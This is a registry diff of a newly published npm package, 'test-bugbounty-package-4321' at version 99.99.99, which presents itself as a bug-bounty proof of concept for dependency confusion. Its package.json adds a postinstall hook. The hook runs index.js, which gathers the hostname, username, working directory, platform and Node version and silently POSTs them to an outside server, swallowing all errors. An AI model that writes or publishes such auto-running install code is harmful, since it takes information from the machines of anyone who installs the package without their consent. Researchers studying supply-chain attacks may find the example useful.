test-bugbounty-package-4321 99.99.99
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +46 -0
- package/package.json +15 -0
package/index.js
ADDED
|
@@ -0,0 +1,46 @@
|
|
|
1
|
+
// Bug Bounty - Dependency Confusion PoC
|
|
2
|
+
// If this package was installed, your build system may be vulnerable to dependency confusion.
|
|
3
|
+
// Package: test-bugbounty-package-4321
|
|
4
|
+
// If you have any questions, please contact: dd_06@wearehackerone.com
|
|
5
|
+
|
|
6
|
+
const https = require('https');
|
|
7
|
+
const http = require('http');
|
|
8
|
+
const os = require('os');
|
|
9
|
+
|
|
10
|
+
const info = {
|
|
11
|
+
pkg: "test-bugbounty-package-4321",
|
|
12
|
+
hostname: os.hostname(),
|
|
13
|
+
platform: os.platform(),
|
|
14
|
+
arch: os.arch(),
|
|
15
|
+
cwd: process.cwd(),
|
|
16
|
+
user: os.userInfo().username,
|
|
17
|
+
nodeVersion: process.version,
|
|
18
|
+
timestamp: new Date().toISOString()
|
|
19
|
+
};
|
|
20
|
+
|
|
21
|
+
try {
|
|
22
|
+
const url = new URL('https://deepbounty.dd06-dev.fr/cb/8e46e6e8-b7bf-49a8-a4d8-ce590ff540d5');
|
|
23
|
+
const client = url.protocol === 'https:' ? https : http;
|
|
24
|
+
const postData = JSON.stringify(info);
|
|
25
|
+
|
|
26
|
+
const options = {
|
|
27
|
+
hostname: url.hostname,
|
|
28
|
+
port: url.port,
|
|
29
|
+
path: url.pathname + url.search,
|
|
30
|
+
method: 'POST',
|
|
31
|
+
headers: {
|
|
32
|
+
'Content-Type': 'application/json',
|
|
33
|
+
'Content-Length': Buffer.byteLength(postData)
|
|
34
|
+
}
|
|
35
|
+
};
|
|
36
|
+
|
|
37
|
+
const req = client.request(options, (res) => {
|
|
38
|
+
res.resume();
|
|
39
|
+
});
|
|
40
|
+
|
|
41
|
+
req.on('error', (e) => {});
|
|
42
|
+
req.write(postData);
|
|
43
|
+
req.end();
|
|
44
|
+
} catch (e) {
|
|
45
|
+
// Ignore errors
|
|
46
|
+
}
|
package/package.json
ADDED
|
@@ -0,0 +1,15 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "test-bugbounty-package-4321",
|
|
3
|
+
"version": "99.99.99",
|
|
4
|
+
"description": "Bug Bounty package - If you see this, your organization may be vulnerable to dependency confusion",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"postinstall": "node index.js"
|
|
8
|
+
},
|
|
9
|
+
"keywords": [
|
|
10
|
+
"security",
|
|
11
|
+
"bug-bounty",
|
|
12
|
+
"dependency-confusion"
|
|
13
|
+
],
|
|
14
|
+
"license": "MIT"
|
|
15
|
+
}
|